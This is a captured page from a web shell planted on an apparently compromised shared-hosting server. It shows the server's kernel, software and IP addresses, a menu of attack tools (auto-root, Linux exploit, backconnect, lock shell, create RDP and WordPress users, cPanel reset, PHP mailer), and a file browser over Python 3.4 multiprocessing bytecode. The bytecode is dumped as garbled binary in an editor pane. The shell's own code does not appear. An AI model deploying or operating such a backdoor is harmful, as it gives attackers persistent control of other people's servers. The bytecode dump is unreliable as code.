Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.144.35.187
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
python34 /
lib64 /
python3.4 /
multiprocessing /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-34.pyc
566
B
-rw-r--r--
__init__.cpython-34.pyo
566
B
-rw-r--r--
connection.cpython-34.pyc
26.9
KB
-rw-r--r--
connection.cpython-34.pyo
26.54
KB
-rw-r--r--
context.cpython-34.pyc
13.22
KB
-rw-r--r--
context.cpython-34.pyo
13.22
KB
-rw-r--r--
forkserver.cpython-34.pyc
7.08
KB
-rw-r--r--
forkserver.cpython-34.pyo
6.97
KB
-rw-r--r--
heap.cpython-34.pyc
6.57
KB
-rw-r--r--
heap.cpython-34.pyo
6.33
KB
-rw-r--r--
managers.cpython-34.pyc
34.93
KB
-rw-r--r--
managers.cpython-34.pyo
34.32
KB
-rw-r--r--
pool.cpython-34.pyc
22.61
KB
-rw-r--r--
pool.cpython-34.pyo
22.3
KB
-rw-r--r--
popen_fork.cpython-34.pyc
2.4
KB
-rw-r--r--
popen_fork.cpython-34.pyo
2.35
KB
-rw-r--r--
popen_forkserver.cpython-34.py...
2.49
KB
-rw-r--r--
popen_forkserver.cpython-34.py...
2.49
KB
-rw-r--r--
popen_spawn_posix.cpython-34.p...
2.27
KB
-rw-r--r--
popen_spawn_posix.cpython-34.p...
2.27
KB
-rw-r--r--
popen_spawn_win32.cpython-34.p...
3
KB
-rw-r--r--
popen_spawn_win32.cpython-34.p...
2.94
KB
-rw-r--r--
process.cpython-34.pyc
8.72
KB
-rw-r--r--
process.cpython-34.pyo
8
KB
-rw-r--r--
queues.cpython-34.pyc
9.83
KB
-rw-r--r--
queues.cpython-34.pyo
9.74
KB
-rw-r--r--
reduction.cpython-34.pyc
7.6
KB
-rw-r--r--
reduction.cpython-34.pyo
7.55
KB
-rw-r--r--
resource_sharer.cpython-34.pyc
5.52
KB
-rw-r--r--
resource_sharer.cpython-34.pyo
5.48
KB
-rw-r--r--
semaphore_tracker.cpython-34.p...
3.64
KB
-rw-r--r--
semaphore_tracker.cpython-34.p...
3.6
KB
-rw-r--r--
sharedctypes.cpython-34.pyc
7.16
KB
-rw-r--r--
sharedctypes.cpython-34.pyo
7.09
KB
-rw-r--r--
spawn.cpython-34.pyc
6.92
KB
-rw-r--r--
spawn.cpython-34.pyo
6.87
KB
-rw-r--r--
synchronize.cpython-34.pyc
12.06
KB
-rw-r--r--
synchronize.cpython-34.pyo
11.74
KB
-rw-r--r--
util.cpython-34.pyc
9.43
KB
-rw-r--r--
util.cpython-34.pyo
9.3
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : forkserver.cpython-34.pyo
� e f! � @ sd d d l Z d d l Z d d l Z d d l Z d d l Z d d l Z d d l Z d d l Z d d l m Z d d l m Z d d l m Z d d l m Z d d l m Z d d l m Z d d d d g Z d Z e j d � Z Gd d � d e � Z d d d d � Z d d � Z d d � Z d d � Z e � Z e j Z e j Z e j Z e j Z d S)� N� )� connection)�process)� reduction)�semaphore_tracker)�spawn)�util�ensure_running�get_inherited_fds�connect_to_new_process�set_forkserver_preload� �Qc @ sL e Z d Z d d � Z d d � Z d d � Z d d � Z d d � Z d S)� ForkServerc C s: d | _ d | _ d | _ t j � | _ d g | _ d S)N�__main__)�_forkserver_address�_forkserver_alive_fd�_inherited_fds� threadingZLock�_lock�_preload_modules)�self� r �?/opt/alt/python34/lib64/python3.4/multiprocessing/forkserver.py�__init__! s zForkServer.__init__c C s8 t d d � | j D� � s+ t d � � n | | _ d S)z>Set list of module names to try to load in forkserver process.c s s! | ] } t | � t k Vq d S)N)�type�str)�.0�modr r r � <genexpr>* s z4ForkServer.set_forkserver_preload.<locals>.<genexpr>z&module_names must be a list of stringsN)�allr � TypeError)r Z modules_namesr r r r ( s z!ForkServer.set_forkserver_preloadc C s | j S)z�Return list of fds inherited from parent process. This returns None if the current process was not started by fork server. )r )r r r r r . s zForkServer.get_inherited_fdsc C s | j � t | � d t k r/ t d � � n t j t j � �� } | j | j � t j � \ } } t j � \ } } | | | j t j � g } | | 7} zJ y t j | | � | | f SWn% t j | � t j | � � Yn XWd t j | � t j | � XWd QXd S)a; Request forkserver to create a child process. Returns a pair of fds (status_r, data_w). The calling process can read the child process's pid and (eventually) its returncode from status_r. The calling process should write to data_w the pickled preparation and process data. � ztoo many fdsN)r �len�MAXFDS_TO_SEND� ValueError�socket�AF_UNIXZconnectr �os�piper r Zgetfdr Zsendfds�close)r �fdsZclientZparent_r�child_w�child_rZparent_wZallfdsr r r r 6 s&